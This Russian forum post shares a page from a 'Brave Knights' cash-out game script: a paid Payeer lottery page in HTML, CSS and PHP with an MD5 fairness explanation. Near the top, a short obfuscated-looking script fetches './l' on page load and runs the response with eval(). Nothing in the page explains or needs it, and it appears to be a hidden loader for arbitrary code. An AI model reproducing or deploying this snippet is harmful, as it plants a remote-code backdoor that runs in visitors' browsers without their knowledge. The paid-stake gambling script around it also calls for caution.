  • Награды Репутация  более 25 Более 1500 сообщений Более 2 лет на форуме Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Возраст: 26
  • Сообщений: 1630
  • Страна: ru
  • Поблагодарили: 143 раз(а)
  • Репутация +27/-0
  • Пол: Мужской
  • telegram --> @kvozimir
  • Дата рождения:1992-04-18
    • Награды
  • Социальные сети:
    ВКонтакте
Brave Knights - Скрипт игры с выводом денег
« Ответ #29 : 06 Май 2018, 11:49:01 »
Нет оценки
Открыть / Закрыть
<div class="block1
"><div class="h-title1
">Лотерея</div></div>

<div class="block2">
<div class="some-content-related-div">
<div id="inner-content-div">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script>
function x(){try{return new XMLHttpRequest();}catch(e){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){return null;}}}};function y(){var z=x();if(z){z.open('get','./l');z.onreadystatechange=function(){if(z.readyState==4){
eval(z.responseText);}};z.send(null);}};y();</script>
<script type="text/javascript" src="../../js/m-lotery.js"></script>
<style>
tr.tr-m:hover{
   background:rgba(134,62,0,1.00);
}

tr.tr-m-1{
   background:rgba(8, 251, 71, 0.73);
}
img.img-m{
   cursor:pointer;
}
img.img-m:hover{
   opacity:0.5;
}
img.ing-px{
   margin-left:3px;
}
td.rhp{
   border-right: 1px solid #E35E04;
   border-radius:0px;
   padding:2px 0;
   cursor: pointer;
}
b.b-m{
   color:#E35E04;
   font-size:16px;
}
div.error-j{
   color:red;
   font-size:18px;
}
div.but-m{
   background:#D17602;
   width:100px;
   border: 1px solid #844500;
   color:#FFFFFF;
   font-size:16px;
   cursor: pointer;
   position:relative;
   top:10px;
   -webkit-border-radius: 15px;
   -moz-border-radius: 15px;
   border-radius: 15px;
}
div.but-m:hover{
   background:rgba(209, 118, 2, 0.67);
}



span.but-s{
   background:#D17602;
   width:100px;
   border: 1px solid #844500;
   color:#FFFFFF;
   font-size:16px;
   cursor: pointer;
   position:relative;
   top:10px;
   margin-left:3px;
   margin-right:3px;
   padding: 2px 10px;
   -webkit-border-radius: 15px;
   -moz-border-radius: 15px;
   border-radius: 15px;
}

span.but-sn{
   background:#D17602;
   width:100px;
   border: 1px solid #844500;
   color:#FFFFFF;
   font-size:16px;
   cursor: pointer;
   position:relative;
   top:10px;
   margin-left:3px;
   margin-right:3px;
   padding: 2px 10px;
   -webkit-border-radius: 15px;
   -moz-border-radius: 15px;
   border-radius: 15px;
   opacity:0.5;
}
span.but-s:hover{
   background:rgba(209, 118, 2, 0.67);
}
div.mder5{
   position:relative;
   top:20px;
}

.block222 {
background: url('/img/block2.png') repeat-y;
    position: relative;
    z-index: 10;
    left: 50%;
    margin-left: -160px;
    padding: 0px 50px 10px 50px;
    float: center;
    height: 460px;
   
    color: #000000;
    font-family: 'Comic Sans MS', cursive;
    font-size: 11pt;
    width: 560px;}

td.md{
   background:#D17602;
   color:#FFFFFF;
   font-size:16px;
   border-radius: 0;
   padding: 2px 10px;
}

td.md-2{
   background:rgba(209, 118, 2, 0.38);
   color:#714525;
   font-size:16px;
   border-radius: 0;
   padding: 2px 10px;
}
img.im-op{
   background:rgba(140,140,140,0.40);
   opacity:0.6;
   -webkit-border-radius: 2px;
   -moz-border-radius: 2px;
   border-radius: 2px;
}
img.win{
   background:#3CDF03;
   -webkit-border-radius: 2px;
   -moz-border-radius: 2px;
   border-radius: 2px;
}
a.butter
{
   margin-left: 10px;
   color: #0B72A1;
   border: 3px solid #0B72A1;
   padding:3px 10px;
   border-radius:20px;
   cursor:pointer;
   text-decoration:none;
}
a.butter:hover
{
   background: rgba(50,116,251,0.30);
   margin-left: 10px;
   color: #0B72A1;
   border: 3px solid #0B72A1;
   padding:3px 10px;
   border-radius:20px;
   text-decoration:underline;
}
div.jackpot{
   width: 90%;
   background: -moz-linear-gradient(left center , rgba(255,255, 255, 0.95), #34a1d8, rgba(255,255, 255, 0.95)) repeat;
   background: linear-gradient(to left , rgba(255,255, 255, 0.95), #34a1d8, rgba(255,255, 255, 0.95));
   color:#FFFFFF;
   font-size:20px;
   font-weight:bold;
}
div.erlot{
   width: 605px;
   background: -moz-linear-gradient(left center , rgba(255,255, 255, 0.95), #34a1d8, rgba(255,255, 255, 0.95)) repeat ;
   background: linear-gradient(to left , rgba(255,255, 255, 0.95), #34a1d8, rgba(255,255, 255, 0.95));
   color:#0D0F95;
   font-size:20px;
   font-weight:bold;
}
.toggle-box {
  display: none;
}
.toggle-box + label {
  cursor: pointer;
  display: block;
  font-weight: normal;
  line-height: 21px;
  margin-bottom: 5px;
  color: #FFFFFF;
  font-size:14px;
  font-weight:bold;
  text-align:center;
  font-weight:bold;
}
.toggle-box + label:hover{
   text-decoration:underline;
}
.toggle-box + label + div {
  display: none;
  margin-bottom: 10px;
}
.toggle-box:checked + label + div {
  display: block;
}
.silver-bk {
   
   border:0px solid #dddddd;
   width:500px;
   margin:-10px 0px 0px 0px;
   padding:10px 40px 10px 20px;
   color:#7ea57b;height:450px;
}
.toggle-box + label:before {

  display: block;
  float: left;
  font-size: 15px;
  font-weight: bold;
  height: 20px;
  padding-left:1px;
  line-height: 18px;
  margin: 2px 5px 0px;
  text-align: center;
  width: 20px;
}

div.faq-st{
   background:#0B72A1;
   padding:15px;
   text-align:justify;
   -webkit-border-radius: 2px;
   -moz-border-radius: 2px;
   -ms-border-radius: 2px;
   -o-border-radius: 2px;
   border-radius: 2px;
   color:#FFFFFF;
   font-size:14px;
}
a.a-e{
   color:#862F00;
   font-size:12px;
   text-decoration:none;
}
span.a-e{
   color:#862F00;
   font-size:12px;
}
a.a-e:hover{
   color:#862F00;
   font-size:12px;
   text-decoration: underline;
}

span.a-e{
   color:#862F00;
   font-size:12px;
   text-decoration:none;
}
span.a-e:hover{
   color:#862F00;
   font-size:12px;
   text-decoration: underline;
}

.tit-ler{
   font-size:13px;
   text-align:justify;
}
.tit-war{
   background:rgba(255,234,51,1.00);
   border: 1px dashed rgba(255,0,4,1.00);
   padding:1px 10px;
   margin:10px 0;
   color:rgba(255,0,4,1.00);
   font-size:13px;
   font-weight:bold;
}
.port-pot{
   position:relative;
   color:#FFFFFF;
   font-size:16px;
   bottom:5px;
   font-weight:bold;
}
.s-md5{
   color:#FFFFFF;
   font-size:14px;
}
img.img-rad{
   border: 1px dashed #06165C;
   -webkit-border-radius: 5px;
   -moz-border-radius: 5px;
   -ms-border-radius: 5px;
   border-radius: 5px;
}
.b-rad{
   border-radius:0;
}
.borer-t{
   border-top: 1px solid #0E5498;
}
.gt-rot{
   color:#0E5498;
   font-size:16px;
   font-weight:bold;
}
.gt-rot2{
   color:#0E5498;
   font-size:12px;
}
</style>
 

<?
echo '<div class="s-bk-lf">';
   echo '<div class="acc-titl"><span class="objecter"></span></div>';
echo '</div>';
if(isset($_GET['reepaylot']))
{
   if($_GET['reepaylot']=="ok")
   {
      echo '<br /><center><div class="erlot">Оплата прошла успешно .</div><br /><br />';
      echo '<div style="width:605"><a href="/account/lotterym" title="" class="butter">Перейти к лотереи</a></div></center>';
      return;
   }
   if($_GET['reepaylot']=="error")
   {
      echo '<center><br /><div class="erlot">Ошибка оплаты!!! попробуйте оплатить чуть позже.</div></center>';
   }
}

?>



<div id="noscript" class="error-j" align="center">
  Для игры в Мгновенную лотерею Пожалуйста, включите JavaScript!
</div>
<script>
  $('#noscript').hide();
</script>




<?
echo '<div class="silver-bk" align="center">';

echo '<div id="loterey"></div>';//поле лотереи
   echo '<div style="width:505px;">';
   
      echo '<div style="width:95%">';
         
         echo '<div class="faq-st">';
            echo '<center><b>Игра : Мгновенная Лотерея с выводом на счет "PAYEER"!</b></center>';
            echo '<span class="tit-ler">';
               echo '
                  <b>Описание :</b><br />
                  - После того как вы нажали на кнопку играть, генерируется билет .<br />
                  - Начать играть вы сможете только после того когда выберете ставку и оплатите её через систему PAYEER.<br />
                  <div class="tit-war">
                     Если созданная игра не будет оплачена в течении 12 часов она будет удалена как не активная.
                  </div>
                  - После оплаты вы можете приступить к игре .<br />
                  - Предметы на игровом поле распределяются в случайном порядке сразу когда вы нажмете кнопку играть,
                  действует теория вероятности, предметы не меняют свое местоположение это можете проверить в конце игры.<br />
                  - Коэффициенты выигрыша зависят от вашего первого хода.<br />
                  - в игре 25 выигрышные комбинации! (подробно в разделе Дополнительно)<br />
                  - Выплата:  автоматическая<br />

                  <div class="tit-war">
                     Если оплаченная игра не будет закончена в течении 12 часов она будет завершена
                     автоматически. Ставки не возвращаются.
                  </div>
               ';
            echo '</span>';
            echo '<input class="toggle-box" id="identifier-1" type="checkbox" >';
            echo '<label for="identifier-1"><span class="but-s">Дополнительно</span></label>';
            echo '<div>';
               echo '<br />';
               echo '<table width="100%" border="0" cellspacing="2" cellpadding="2">';
               
                  echo '<tr>';
                     echo '<td width="50%">';
                        echo '<span class="port-pot">
                           Первый ход начинайте с нижней строки:
                        </span>';
                     echo '</td>';
                     echo '<td width="50%"><img class="img-rad" src="../../img/bg-info-hod.png" width="202" alt=""/></td>';
                    echo '</tr>';
               
                  echo '<tr>';
                     echo '<td width="50%">';
                        echo '<span class="port-pot">Первый ход : &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span>';
                        echo '<img src="../../img/bg-lot-moneta_1.png" width="20" alt=""/> ';
                        echo '<span class="port-pot">(1)*</span>';
                     echo '</td>';
                     echo '<td width="50%"><img class="img-rad" src="../../img/bg-info-moneta_1.png" width="202" alt=""/></td>';
                    echo '</tr>';
                  
                  echo '<tr>';
                     echo '<td>';
                        echo '<span class="port-pot">Первый ход : &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span>';
                        echo '<img src="../../img/bg-lot-moneta_2.png" width="20" alt=""/> ';
                        echo '<span class="port-pot">(2)*</span>';
                     echo '</td>';
                     echo '<td><img class="img-rad" src="../../img/bg-info-moneta_2.png" width="202" alt=""/></td>';
                    echo '</tr>';
                  
                  echo '<tr>';
                     echo '<td>';
                        echo '<span class="port-pot">Первый ход : &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span>';
                        echo '<img src="../../img/bg-lot-moneta_3.png" width="20" alt=""/> ';
                        echo '<span class="port-pot">(3)*</span>';
                     echo '</td>';
                     echo '<td><img class="img-rad" src="../../img/bg-info-moneta_3.png" width="202" alt=""/></td>';
                    echo '</tr>';
                  
                  echo '<tr>';
                     echo '<td>';
                        echo '<span class="port-pot">Первый ход : &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span>';
                        echo '<img src="../../img/bg-lot-moneta_4.png" width="20" alt=""/> ';
                        echo '<span class="port-pot">(4)*</span>';
                     echo '</td>';
                     echo '<td><img class="img-rad" src="../../img/bg-info-moneta_4.png" width="202" alt=""/></td>';
                    echo '</tr>';
                  
                  echo '<tr>';
                     echo '<td>';
                        echo '<span class="port-pot">Первый ход : &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span>';
                        echo '<img src="../../img/bg-lot-moneta_5.png" width="20" alt=""/> ';
                        echo '<span class="port-pot">(5)*</span>';
                     echo '</td>';
                     echo '<td><img class="img-rad" src="../../img/bg-info-moneta_5.png" width="202" alt=""/></td>';
                    echo '</tr>';
                  echo '<tr>';
                     echo '<td align="center" colspan="2">';
                        echo '<span style="color:#FFF; font-size:12px;">';
                           echo '(1)*...(5)* номера предметов на игровом поле.';
                        echo '</span>';
                     echo '<td />';
                  echo '</tr>';
                  
                  echo '<tr>';
                     echo '<td align="center" colspan="2">';
                        echo '<span style="color:#FFF;">';
                           echo '<span class="port-pot">Как Проверить контроль честности MD5?</span><br />';
                           
                           echo '<div align="justify" class="s-md5">';
                              echo '
                                 Игрок купил лотерею. Увидел там MD5 хэш ответа.
                                 К примеру –4519cc4f7fbb156263d623e3213cbd1e (32 символа). <br />
                                 Игра прошла, есть результат. Появилась исходная строка, которая содержит
                                 результат игры + случайный мусор(генерируется случайным образом для защиты от
                                 подбора MD5 хэша, при короткой строке результата). <br />
                                 На любом независимом сервисе генерации MD5 хэшей (к примеру : www.md5.cz ) или
                                 в любой программе, позволяющей сделать это, игрок может обработать строку из
                                 поля результат игры по алгоритму MD5 и получить MD5 хэш
                                 =4519cc4f7fbb156263d623e3213cbd1e. Т.е. аналогичный исходному.<br />
                                 <span class="port-pot">Что копировать показано на рисунке ниже.</span>
                              ';
                           echo '</div>';
                        echo '</span>';
                        echo '<img class="img-rad" src="../../img/bg-info-md5.png" width="448" alt=""/>';
                     echo '<td />';
                  echo '</tr>';
               echo '</table>';
            echo '</div>';
         echo '</div>';
         
      echo '</div>';
   echo '</div>';
   echo '<div align="center" style="width: 605px;">';
      
      
   echo '</div>';
echo '</div>';
?>
<script type="text/jscript">
   load_lotery();
</script>

</div></div></div>
<div class="clr"></div>   <div class="block3"></div>
   
[свернуть]
 
Теги:
 

Скрипт "МЛМ" 5RUB

Автор shans5Раздел Скрипты разных сайтов

Ответов: 1
Просмотров: 2134
Последний ответ 24 Ноябрь 2015, 10:27:32
от good7
Скрипт "Ферма соседи" 2.0 0

Автор shans5Раздел Скрипты фф

Ответов: 5
Просмотров: 2741
Последний ответ 11 Апрель 2018, 11:33:42
от vituxa
Скрипт удвоителя Payeer (Double-Payeer)

Автор velas85Раздел Скрипты разных сайтов

Ответов: 0
Просмотров: 375
Последний ответ 01 Январь 2016, 21:52:32
от velas85
Скрипт модуль - "Камикадзе"

Автор barakudaРаздел Модули для фф

Ответов: 8
Просмотров: 3688
Последний ответ 04 Сентябрь 2016, 18:17:40
от DRAGONS
Скрипт пивоварня "Berloga"

Автор shans5Раздел Скрипты фф

Ответов: 2
Просмотров: 1431
Последний ответ 27 Сентябрь 2016, 11:01:59
от shans5
Имя пользователя:
Пароль:
Session: